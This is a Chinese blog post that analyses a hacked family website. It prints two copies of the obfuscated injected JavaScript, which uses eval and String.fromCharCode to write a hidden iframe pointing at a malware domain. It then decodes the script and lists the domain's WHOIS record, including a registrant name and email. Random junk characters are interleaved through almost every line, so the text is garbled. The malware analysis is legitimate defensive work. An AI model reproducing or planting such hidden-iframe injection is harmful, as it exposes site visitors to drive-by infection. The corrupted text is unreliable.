首发在我的博客里面,
_ k-_&PR QFh1sb)]d) http://www.areway.cn/?p=175 O*yxOb* M5xJ_yjG Qm%F]nyy 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
`-NK:;^ `:/'")+@v <script>t=’60,105,102,114,97,109,101,
!Sq<_TO 32,115,114,99,61,104,116,116,112,58,47,47,
P
rt}
01$ 102,114,101,101,46,117,45,117,117,117,46,99,
Sb.8d]DW 110,47,101,114,114,111,114,46,104,116,109,
:t?B) 32,119,105,100,116,104,61,49,48,48,32,104,
=:W2NN' 101,105,103,104,116,61,48,62,60,47,105,102,
sFU< PgV 114,97,109,101,62′;
=TB_|`5;j t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
[^H2'&] xn8KOwX% <script>t=’60,105,102,114,97,109,101,32,115,
jU,Xlgz(A 114,99,61,104,116,116,112,58,47,47,102,114,
j!;LN)s@? 101,101,46,117,45,117,117,117,46,99,110,47,
W{p}N 101,114,114,111,114,46,104,116,109,32,119,
LiJYyp 105,100,116,104,61,49,48,48,32,104,101,105,
37AVk`a 103,104,116,61,48,62,60,47,105,102,114,97,
5>532X(0 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
9+.wj/75 document.write(t);</script>
nhI+xqfn P<<$o-a" <html xmlns=”
#h5:b`fDF http://www.w3.org/1999/xhtml A|A~$v("R “>
HDVimoOq <head>
bMH~vR <!– Published By Newasp.cc 2007-12-7-18:03:23 –>
{@Wv@H+4 <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
%idBR7?`g <title>首页 - 爱生活家庭网
7Q
3!=b 5=>1>HYM 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
6W1GvM\e 转换字符串后的大概内容是(谁点击后果自付):
dBWny& <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
b
F=MQ s.3"2waZ=T 查询玉米u-uuu.cn的详细信息:
]5Cr$%H= Domain Name: u-uuu.cn
,5DJ54B! ROID: 20070901s10001s64972306-cn
b|#=kPVgL} Domain Status: ok
]TV_p[L0B Registrant Organization: 王雷
'C+cQLig@ Registrant Name: 王雷
sEhvx+( Administrative Email:
czlovexs@126.com
c{#2;k
Q, Sponsoring Registrar: 北京万网志成科技有限公司
/qpSmRL Name Server:ns.yovole.com
h$S#fY8 Name Server:ns1.yovole.com
=bKDD<( Registration Date: 2007-09-01 17:54
R|;BO:S1 Expiration Date: 2008-09-01 17:54
1#vy# ' 最后PING了一下地址 都没有什么….
}$6L]
0b&